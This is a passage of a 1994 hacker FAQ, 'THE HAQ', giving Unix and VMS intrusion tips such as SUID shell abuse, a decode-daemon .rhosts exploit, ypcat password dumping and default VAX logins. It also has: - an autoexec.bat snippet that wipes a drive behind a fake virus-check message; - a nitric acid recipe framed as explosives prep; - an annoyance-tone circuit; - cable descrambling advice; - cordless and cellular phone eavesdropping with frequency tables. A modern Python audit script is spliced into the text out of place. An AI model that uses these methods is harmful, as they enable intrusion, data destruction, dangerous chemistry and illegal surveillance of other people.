                at (and usually should be brought to when a cd is
                done)

shell       -=> this is the name of the shell which is automatically
                started for the login

Note that all the fields are separated by colons in the passwd file.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discreetly!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner. A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):

1. Someone has a SUID program on their account, it happens to allow
   a shell to, like @ or jump to a shell. If it does that, after you
   execute said file and then spawn a shell off of it, all you do in
   that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
   writable, just write over it a script that spawns a shell, and you
   got their privs again.
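The passwd layout, the default account list and the shadow markers described above can be checked from the administrator's side. The audit below is an added example, not part of the original FAQ; the finding codes, the NOLOGIN_SHELLS set and the sample entries are assumptions constructed for illustration.

```python
"""Added example: audit passwd-format text for the weaknesses described above."""
import re
from collections import namedtuple

# Field order as given on this page:
#   userid:password:userid#:groupid#:GECOS field:home dir:shell
Entry = namedtuple("Entry", "userid password uid gid gecos home shell")

# Default account names listed on this page.
DEFAULT_ACCOUNTS = {"root", "admin", "sysadmin", "unix", "uucp", "rje",
                    "guest", "demo", "daemon", "sysbin"}

# Traditional DES crypt output is 13 characters (2 of salt, then 11 more),
# all taken from the 64-character alphabet ./0-9A-Za-z.
DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")

# Assumption: the shells this site uses to refuse interactive logins.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# Finding codes (hypothetical names chosen for this example).
EMPTY_PASSWORD = "EMPTY_PASSWORD"    # account needs no password at all
UNSHADOWED_HASH = "UNSHADOWED_HASH"  # hash is readable by every local user
EXTRA_UID0 = "EXTRA_UID0"            # root-equivalent account not named root
DEFAULT_LOGIN = "DEFAULT_LOGIN"      # well-known default account can log in


def parse_passwd(text):
    """Return (entries, skipped); skipped holds (line, reason) pairs."""
    entries, skipped = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line[0] in "+-":
            # Yellow Pages (NIS) include/exclude markers are not accounts.
            skipped.append((line, "NIS compat entry"))
            continue
        fields = line.split(":")
        if len(fields) != 7 or not (fields[2].isdigit() and fields[3].isdigit()):
            skipped.append((line, "malformed"))
            continue
        userid, password, uid, gid, gecos, home, shell = fields
        entries.append(Entry(userid, password, int(uid), int(gid),
                             gecos, home, shell))
    return entries, skipped


def audit(entries):
    """Return (userid, finding code) pairs in file order."""
    findings = []
    for e in entries:
        if e.password == "":
            findings.append((e.userid, EMPTY_PASSWORD))
        elif DES_CRYPT.fullmatch(e.password):
            findings.append((e.userid, UNSHADOWED_HASH))
        if e.uid == 0 and e.userid != "root":
            findings.append((e.userid, EXTRA_UID0))
        # An empty shell field means the system default shell, so it counts
        # as a login shell here.
        if (e.userid in DEFAULT_ACCOUNTS and e.userid != "root"
                and e.shell not in NOLOGIN_SHELLS):
            findings.append((e.userid, DEFAULT_LOGIN))
    return findings


# Constructed sample, not taken from any real system. The guest "hash" is a
# placeholder with the right shape, not the output of crypt().
SAMPLE = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
uucp::10:10:uucp:/var/spool/uucp:/bin/sh
guest:abEXAMPLEHASH:500:100:Guest:/home/guest:/bin/sh
toor:x:0:0:backup admin:/root:/bin/sh
alice:x:1001:100:Alice Example,Room 12,555-0100:/home/alice:/bin/sh
+::0:0:::
broken line without enough fields
"""

if __name__ == "__main__":
    parsed, ignored = parse_passwd(SAMPLE)
    for userid, code in audit(parsed):
        print(f"{userid:8} {code}")
    for line, reason in ignored:
        print(f"skipped ({reason}): {line}")
```

An "x", "*" or "!" in the password field produces no finding here because the real hash, if any, lives in the shadow file, which needs its own review.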
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)
If you can get access to the 'console' AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce. Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don't do utmp
logging as a default in AIX. Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)
A UNIX disk quota may be increased by finding a directory on another
partition and using that. Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they've put their subdirectory in it, change the perms on the
directory to only read-execute. The reason this works is that usually
accounts are distributed across a couple of filesystems, and admins
are usually too lazy to give users the same quotas on each
filesystem. If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a 'hidden' subdirectory like .debug there, and using that.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:

xsetroot -bitmap bitmapname
    [display the bitmap on your screen]

xsetroot -bitmap bitmapname -display xt2500:0
    [display the bitmap on another xterm]

Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with. They are then logged in as you
though, and can erase your filespace, etc. Beware!

Slightly irritating:
xclock -geom 1200x1200 -display xt??:0
    [fills the entire screen with a clock]

Slightly more irritating:
Use a shell script with xsetroot to flash people's screens different
colors.

On the nastier side:
Use a shell script with xsetroot to kill a person's window manager.

Downright nasty:
Consult the man pages on xkill. It is possible to kill windows on
any display. So to log someone off an xterm you merely have to xkill
their login window.

Protect yourself:
If you use xhost - this will disable other people from being able to
log you out or generally access your terminal.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode. If it gives you something, you can use it.
If it tells you that the user doesn't exist, or whatever, you can't.

If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
   (What happens: the decode daemon (1st) decodes the process, but
   leaves the bin privileges resident. (2nd) the echo command is
   executed, because now the decoded message assumes the bin
   privileges [which are *still* active, even though the daemon
   didn't issue the command]).
3) If this is done right, you will be able to rlogin to the system.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file management:

ypcat /etc/passwd > whatever.filename
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
Password encryption on UNIX is based on a modified version of the
DES [Data Encryption Standard].
Contrary to popular belief, the typed password is not encrypted.
Rather the password is used as the key to encrypt a block of
zero-valued bytes.
To begin the encryption, the first seven bits of each character in
the password are extracted to form the 56-bit key. This implies that
no more than eight characters are significant in a password. Next,
the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to make it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm. The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros. The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, "." and "/"). Because this
coercion involves translations in which several different values are
represented by the same character, password encryption is
essentially one-way; the result cannot be decrypted.

=====================================================================
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)

WHAT IS VAX/VMS?

VAX: Virtual Address eXtension. Computer is designed to use memory
     addresses beyond the actual hardware and can therefore run progs
     larger than physical memory. Developed by Digital Equipment
     Corporation (DEC).

VMS: Virtual Memory System. Also developed by DEC.

DCL: Digital Command Language. Similar to DOS batch language or
     UNIX script language.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE SOME OF THE DEFAULT VAX LOGINS?

Username         Password
--------         --------
DECNET           DECNET
DEFAULT          DEFAULT
DEMO             DEMO
                 unpassworded
FIELD            FIELD
                 SERVICE
GUEST            GUEST
                 unpassworded
OPERATOR         OPERATOR
OPERATIONS       OPERATIONS
SYSMAINT         SYSMAINT
                 SERVICE
                 DIGITAL
SYSTEM           SYSTEM
                 MANAGER
                 OPERATOR
                 SYSLIB
SYSTEST          UETP
                 SYSTEST
SYSTEST_CLIG     CLIG
                 SYSTEST
                 TEST
SUPPORT          SUPPORT
                 DEC
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT?

@: executes a DCL program
     usage- @filename.com

ACCOUNTING: program that tracks usage of the system by users

CREATE: PASCAL compiler
     usage- CREATE filename.pas

CREATE/DIR: create a subdirectory

DEL: delete files
     usage- DEL filename.ext

DIR: list the contents of a directory
     options- /FULL = full listing with all security info
              /BRIEF = brief listing
              * = wildcard for anything
              % = wildcard for a specific character

EDIT: VMS editor, requires VT-220 terminal

HELP: brings up help info

LOGOUT: obvious

MAIL: send E-mail locally and to any connected networks

$PASSWORD: change your password
     usage- $PASSWORD newpassword

PHONE: chat program
     usage- PHONE changes the prompt to a '%', from there type in
            the username you wish to talk to. If the user is on a
            different node then enter nodename::username

PHOTO: record session

RUN: execute an executable file

SHOW: lets you look at a lot of different stuff
     usage- SHOW option
     options- CLUSTER = VAX cluster, if any
              DEFAULT = directory path and device
              DEVICES = system devices (drives, modems, etc.)
              INTRUSION = accounts being hacked, if any
              MEMORY = obvious
              NETWORK = network name and VAX's location in it
              PROCESS = PROCESS processname shows status
              QUOTA = disk space available for account
              SYSTEM = system info
              DAY = obvious
              TIME = obvious
              USERS = online users

TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat')

SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
     usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
     options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
              WORLD = all users in your world
              GROUP = all users in your group
              SYSTEM = all users with SYSPRV privileges

SET TERMINAL: controls terminal settings
     usage- SET TERMINAL/option
     options- WIDTH=80 = set width to 80 columns
              ADVANCED_VIDEO = selects 124x24 lines
              NOADVANCED_VIDEO = unselects 124x24 lines
              ANSI_CRT = selects ANSI escape sequences
              NOANSI_CRT = unselects ANSI escape sequences
              AUTOBAUD = allows computer to select highest possible
                         baud rate
              NOAUTOBAUD = turn off automatic baud selection
              BROADCAST = allows receipt of SEND, MAIL and PHONE
                          messages
              NOBROADCAST = prevents reception of SEND, MAIL and
                            PHONE messages
              DEVICE_TYPE=VT220 = set terminal type to VT-220
              ECHO = enables echoing from DCL command line
              NOECHO = disable DCL command line echoing
              FULLDUP = enable full duplex
              NOFULLDUP = disable full duplex
              HANGUP = log off if no carrier
              NOHANGUP = don't log off even if no carrier
              INQUIRE = show device type of terminal
              PAGE=43 = set display length to 43 lines
              TYPE_AHEAD = enable type ahead function
              NOTYPE_AHEAD = disable type ahead function
              UNKNOWN = use for ASCII device types
              WRAP = set wrap around feature
              NOWRAP = unset wrap around feature
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE COMMON VAX FILENAME EXTENSIONS?

COMPILER SOURCE CODE FILES
==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C   = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking

DCL LANGUAGE FILES
==================
CLD = DCL command description file
COM = DCL batch file

GENERAL FILES
=============
DAT   = DATa file
DIR   = subDIRectory file
EXE   = EXEcutable program
HLP   = text for HeLP libraries
LIS   = system listing files (TYPE, PRINT, PHOTO)
LOG   = batch job output
MEM   = DSR output file
RNO   = DSR source file
SIXEL = file for SIXEL graphics
SYS   = SYStem image file
TJL   = Trouble JournaL
TMP   = TeMPorary file
TXT   = text library input file
UAF   = User Authorization File

MAIL FILES
==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file

EDT EDITOR FILES
================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file

=====================================================================
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can go one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WRITING A .bat FILE TO 'WIPE' A DRIVE.

Add the following code to the end of autoexec.bat:

echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt

This prevents any output from Wipe being output.

=====================================================================
X. Finding out what that encrypted info is
(Cracking programs)

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET THESE PROGRAMS?

Crack:        ftp.virginia.edu    /pub/security
CrackerJack:  bnlux1.bnl.gov      /pub/pezz
COPS:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS WPCRACK?

WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS PKCRACK?

PKCRACK is a dictionary cracker for PKZIP. It works. It's
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but it's better than nothing.

=====================================================================
XI. How do I keep my info secure
(PGP / Cryptology)

WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key and a
public key. The keys are different parts of the whole. I distribute
my public key and anyone who wants can grab it add it to their PGP
keyring. Then when they want to send me a message they encrypt it
with PGP and my public key and then send it. Only I can decrypt it
because you need my secret key to decode it. (Trust me you won't get
my secret key) That is PGP. Please use it if you want to communicate
anything of a ahhhh....sensitive manner.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

========
Unix PGP
========

Host 130.149.17.7
    Location: /pub/local/ini/security
        FILE -rw-rw-r--   651826  Apr  5 1993   pgp22.tar.Z

Host arthur.cs.purdue.edu
    Location: /pub/pcert/tools/unix/pgp
        FILE -r--r--r--   651826  Mar  7 1993   pgp22.tar.Z

Host coombs.anu.edu.au
    Location: /pub/security/cypher
        FILE -r--r--r--   651826  Nov  4 22:28  pgp22.tar.Z

==========
MS-DOS PGP
==========

Host zero.cypher.com
    Location: /pub/pgp
        FILE pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
    Location: /pcsoft/msdos/security
        FILE -rw-r--r--    65160  Aug  9 20:00  pgpshe22.zip

Host nic.switch.ch
    Location: /mirror/msdos/security
        FILE -rw-rw-r--    65160  Aug  9 22:00  pgpshe22.zip

Host plains.nodak.edu
    Location: /pub/aca/msdos/pgp
        FILE -rw-r--r--    65430  Nov 26 18:28  pgpshe22.zip

=======
Mac PGP
=======

Host plaza.aarnet.edu.au
    Location: /micros/mac/info-mac/util
        FILE -r--r--r--   323574  Apr 26 1993   pgp.hqx

Host sics.se
    Location: /pub/info-mac/util
        FILE -rw-rw-r--   323574  Nov  5 11:20  pgp.hqx

Host sumex-aim.stanford.edu
    Location: /info-mac/util
        FILE -rw-r--r--   323574  Apr 26 1993   pgp.hqx
===================================================================== XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. What's on the radio waves? (Radios and Scanning) HOW TO MAKE NITRIC ACID: (from Neurophire) Nitric acid is not TOO expensive, but is hard to find except from chemical supply houses. Purchases can be traced.(From TBBOM13.TXT) There are several ways to make this most essential of all acids for explosives. One method by which it could be made will be presented. again, be reminded that these methods SHOULD NOT BE CARRIED OUT!! Materials: Equipment: ---------- ---------- sodium nitrate or adjustable heat source potassium nitrate retort distilled water ice bath concentrated sulfuric acid stirring rod collecting flask with stopper 1) Pour 32 milliliters of concentrated sulfuric acid into the retort. 2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium nitrate. and add this to the acid slowly. If it all does not dissolve, carefully stir the solution with a glass rod until it does. 3) Place the open end of the retort into the collecting flask, and place the collecting flask in the ice bath. 4) Begin heating the retort, using low heat. Continue heating until liquid begins to come out of the end of the retort. The liquid that forms is nitric acid. Heat until the precipitate in the bottom of the retort is almost dry, or until no more nitric acid is forming. CAUTION: If the acid is heated too strongly, the nitric acid will decompose as soon as it is formed. This can result in the production of highly flammable and toxic gasses that may explode. It is a good idea to set the above apparatus up, and then get away from it. Potassium nitrate could also be obtained from store-bought black powder, simply by dissolving black powder in boiling water and filtering out the sulfur and charcoal. 
To obtain 68 g of potassium nitrate, it would be necessary to dissolve about 90 g of black powder in about one liter of boiling water. Filter the dissolved solution through filter paper in a funnel into a jar until the liquid that pours through is clear. The charcoal and sulfur in black powder are insoluble in water, and so when the solution of water is allowed to evaporate, potassium nitrate will be left in the jar. ===================================================================== XIII. Fun things with solder, wires, and parts (Underground electronics) HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE? (from Angel of Death with Belisarius) The idea is to make a simple timing circuit to create a high freq tone. The timing circuit is based upon the 555-chip and uses a simple speaker to convert the pulses from the 555 into sound. Required materials: 555 timer chip, 9 V battery, .01 uF capacitor, 100k potentiometer, tweeter speaker, wire (the capacitor and resistor values can vary although that changes the possible freqs) -9V (GND) [\ | [s\ | ________ ________ [p \ | | \/ | [e +-------+-------------------+--| 1 8 |-- +9V [a | | | | [k | | | /.01uF CAP | 5 | [e +-+ +--|(------+-----------| 2 5 7 | [r / | | \ | | 5 | [ / | | | | [/ +--------------- | ----------| 3 t 6 |----+ | | | i | | | | | m | | | | +9V --| 4 e 5 | | | | | r | | | | |__________________| | | | | | /\ | | +----\ / \-----+-----------------------------------+ \/ 100k POT 555 Timer Pin Connections ------------------------- Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead of capacitor Pin 2: Pin 6 and other lead of capacitor Pin 3: Other lead of the tweeter, one lead of the resistor Pin 4: Pin 8 and the +9V Pin 5: No connections Pin 6: Pin 2 and the other lead of the potentiometer Pin 7: No connections Pin 8: Pin 4 and the +9V ===================================================================== XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) HOW IS CABLE TV SCRAMBLED? 
(from Aero)
There are three main types of scrambling for cable TV: trap filters,
general scrambling and addressable scrambling.

1. Trap filters. Located in the distribution box and physically
   prevent the desired channel from reaching your house. All you see
   when this technique is used is theoretically static (i.e. a blank
   channel). No filter is perfect, so some signal may reach your TV.
   This is an older system of cable protection, and it is easy to
   bypass (go out to the box and remove the filter).

2. General scrambling. This system scrambles the pay channels (all
   the channels before they reach the box), and you need a special
   decoder to unscramble them. The most common method of scrambling
   is to remove the sync signal. This is also easy to get around as
   you can buy descramblers.

3. Addressable descramblers. The cable box receives the scrambled
   channels, but the cable company sends signals to the box telling
   it which ones should be unscrambled. This is the system used by
   most pay-per-view systems. This is a little harder to defeat, but
   not too bad if you have the right equipment/friends.

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-

+---------------+
|    THE HAQ    |
| Edition 2.07  |
|  11 JUN 1994  |
+---------------+

File 3 of 3

=====================================================================
XV. Tuning in to what's on the radio waves
(Radios and Scanning)

WHAT DO I NEED TO START SCANNING?

There are two main scanner types (determined by the method of radio
reception): either crystal or programmable (synthetic) tuning.
Crystal tuning requires a specific crystal for each desired freq, at

======   ===============
   1         46.610
   2         46.630
   3         46.670
   4         46.710
   5         46.730
   6         46.770
   7         46.830
   8         46.870
   9         46.930
  10         46.970

The range on cordless phones is usually only a block or two. To
monitor someone's calls use a small portable scanner and cassette
recorder and you will have a tape of all their calls.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS?

Cellular telephones are a great source of info as they are used by
doctors, lawyers, and other big business. They are also a great
source of calling card numbers.

Cellular phones operate on a very simple premise. They receive on
one frequency and transmit on another freq in order to allow
simultaneous communication. The area is split into two bands (Band A
and Band B) which are split into 21 cells (hence the name cellular)
and each cell has 16 channels within it.

Cellular arrangement:

   ______            ______
  /      \          /      \
 /        \        /        \
/   Cell   \______/   Cell   \______
\    #1    /      \    #5    /      \
 \        /        \        /        \
  \______/   Cell   \______/   Cell   \
  /      \    #3    /      \    #7    /
 /        \        /        \        /
/   Cell   \______/   Cell   \______/
\    #2    /      \    #6    /      \
 \        /        \        /        \
  \______/   Cell   \______/   Cell   \
  /      \    #4    /      \    #8    /

Band A uses channels 1-333 and Band B uses channels 334-666. Usually
the first channel in each cell is the Data Channel (333 for Cell 1A,
331 for Cell 2A, etc.).

There are simple formulas to calculate the frequency for receive and
transmit for each channel.
Transmit freq = (channel number * .030 MHz) + 870 MHz
Receive freq  = (channel number * .030 MHz) + 825 MHz

So for Channel 333: T=879.990 MHz and R=834.990 MHz

In the tables below, each cell has three rows: the channel numbers,
then the transmit freqs (MHz), then the receive freqs (MHz).

FOR BAND A
==========

Cell #
Chan        1        2        3        4        5        6        7

   1      333      332      331      330      329      328      327
      879.990  879.960  879.930  879.900  879.870  879.840  879.810
      834.990  834.960  834.930  834.900  834.870  834.840  834.810

   2      312      311      310      309      308      307      306
      879.360  879.330  879.300  879.270  879.240  879.210  879.180
      834.360  834.330  834.300  834.270  834.240  834.210  834.180

   3      291      290      289      288      287      286      285
      878.730  878.700  878.670  878.640  878.610  878.580  878.550
      833.730  833.700  833.670  833.640  833.610  833.580  833.550

   4      270      269      268      267      266      265      264
      878.100  878.070  878.040  878.010  877.980  877.950  877.920
      833.100  833.070  833.040  833.010  832.980  832.950  832.920

   5      249      248      247      246      245      244      243
      877.470  877.440  877.410  877.380  877.350  877.320  877.290
      832.470  832.440  832.410  832.380  832.350  832.320  832.290

   6      228      227      226      225      224      223      222
      876.840  876.810  876.780  876.750  876.720  876.690  876.660
      831.840  831.810  831.780  831.750  831.720  831.690  831.660

   7      207      206      205      204      203      202      201
      876.210  876.180  876.150  876.120  876.090  876.060  876.030
      831.210  831.180  831.150  831.120  831.090  831.060  831.030

   8      186      185      184      183      182      181      180
      875.580  875.550  875.520  875.490  875.460  875.430  875.400
      830.580  830.550  830.520  830.490  830.460  830.430  830.400

   9      165      164      163      162      161      160      159
      874.950  874.920  874.890  874.860  874.830  874.800  874.770
      829.950  829.920  829.890  829.860  829.830  829.800  829.770

  10      144      143      142      141      140      139      138
      874.320  874.290  874.260  874.230  874.200  874.170  874.140
      829.320  829.290  829.260  829.230  829.200  829.170  829.140

  11      123      122      121      120      119      118      117
      873.690  873.660  873.630  873.600  873.570  873.540  873.510
      828.690  828.660  828.630  828.600  828.570  828.540  828.510

  12      102      101      100       99       98       97       96
      873.060  873.030  873.000  872.970  872.940  872.910  872.880
      828.060  828.030  828.000  827.970  827.940  827.910  827.880

  13       81       80       79       78       77       76       75
      872.430  872.400  872.370  872.340  872.310  872.280  872.250
      827.430  827.400  827.370  827.340  827.310  827.280  827.250

  14       60       59       58       57       56       55       54
      871.800  871.770  871.740  871.710  871.680  871.650  871.620
      826.800  826.770  826.740  826.710  826.680  826.650  826.620

  15       39       38       37       36       35       34       33
      871.170  871.140  871.110  871.080  871.050  871.020  870.990
      826.170  826.140  826.110  826.080  826.050  826.020  825.990

  16       18       17       16       15       14       13       12
      870.540  870.510  870.480  870.450  870.420  870.390  870.360
      825.540  825.510  825.480  825.450  825.420  825.390  825.360

Cell #
Chan        8        9       10       11       12       13       14

   1      326      325      324      323      322      321      320
      879.780  879.750  879.720  879.690  879.660  879.630  879.600
      834.780  834.750  834.720  834.690  834.660  834.630  834.600

   2      305      304      303      302      301      300      299
      879.150  879.120  879.090  879.060  879.030  879.000  878.970
      834.150  834.120  834.090  834.060  834.030  834.000  833.970

   3      284      283      282      281      280      279      278
      878.520  878.490  878.460  878.430  878.400  878.370  878.340
      833.520  833.490  833.460  833.430  833.400  833.370  833.340

   4      263      262      261      260      259      258      257
      877.890  877.860  877.830  877.800  877.770  877.740  877.710
      832.890  832.860  832.830  832.800  832.770  832.740  832.710

   5      242      241      240      239      238      237      236
      877.260  877.230  877.200  877.170  877.140  877.110  877.080
      832.260  832.230  832.200  832.170  832.140  832.110  832.080

   6      221      220      219      218      217      216      215
      876.630  876.600  876.570  876.540  876.510  876.480  876.450
      831.630  831.600  831.570  831.540  831.510  831.480  831.450

   7      200      199      198      197      196      195      194
      876.000  875.970  875.940  875.910  875.880  875.850  875.820
      831.000  830.970  830.940  830.910  830.880  830.850  830.820

   8      179      178      177      176      175      174      173
      875.370  875.340  875.310  875.280  875.250  875.220  875.190
      830.370  830.340  830.310  830.280  830.250  830.220  830.190

   9      158      157      156      155      154      153      152
      874.740  874.710  874.680  874.650  874.620  874.590  874.560
      829.740  829.710  829.680  829.650  829.620  829.590  829.560

  10      137      136      135      134      133      132      131
      874.110  874.080  874.050  874.020  873.990  873.960  873.930
      829.110  829.080  829.050  829.020  828.990  828.960  828.930

  11      116      115      114      113      112      111      110
      873.480  873.450  873.420  873.390  873.360  873.330  873.300
      828.480  828.450  828.420  828.390  828.360  828.330  828.300

  12       95       94       93       92       91       90       89
      872.850  872.820  872.790  872.760  872.730  872.700  872.670
      827.850  827.820  827.790  827.760  827.730  827.700  827.670

  13       74       73       72       71       70       69       68
      872.220  872.190  872.160  872.130  872.100  872.070  872.040
      827.220  827.190  827.160  827.130  827.100  827.070  827.040

  14       53       52       51       50       49       48       47
      871.590  871.560  871.530  871.500  871.470  871.440  871.410
      826.590  826.560  826.530  826.500  826.470  826.440  826.410

  15       32       31       30       29       28       27       26
      870.960  870.930  870.900  870.870  870.840  870.810  870.780
      825.960  825.930  825.900  825.870  825.840  825.810  825.780

  16       11       10        9        8        7        6        5
      870.330  870.300  870.270  870.240  870.210  870.180  870.150
      825.330  825.300  825.270  825.240  825.210  825.180  825.150

Cell #
Chan       15       16       17       18       19       20       21

   1      319      318      317      316      315      314      313
      879.570  879.540  879.510  879.480  879.450  879.420  879.390
      834.570  834.540  834.510  834.480  834.450  834.420  834.390

   2      298      297      296      295      294      293      292
      878.940  878.910  878.880  878.850  878.820  878.790  878.760
      833.940  833.910  833.880  833.850  833.820  833.790  833.760

   3      277      276      275      274      273      272      271
      878.310  878.280  878.250  878.220  878.190  878.160  878.130
      833.310  833.280  833.250  833.220  833.190  833.160  833.130

   4      256      255      254      253      252      251      250
      877.680  877.650  877.620  877.590  877.560  877.530  877.500
      832.680  832.650  832.620  832.590  832.560  832.530  832.500

   5      235      234      233      232      231      230      229
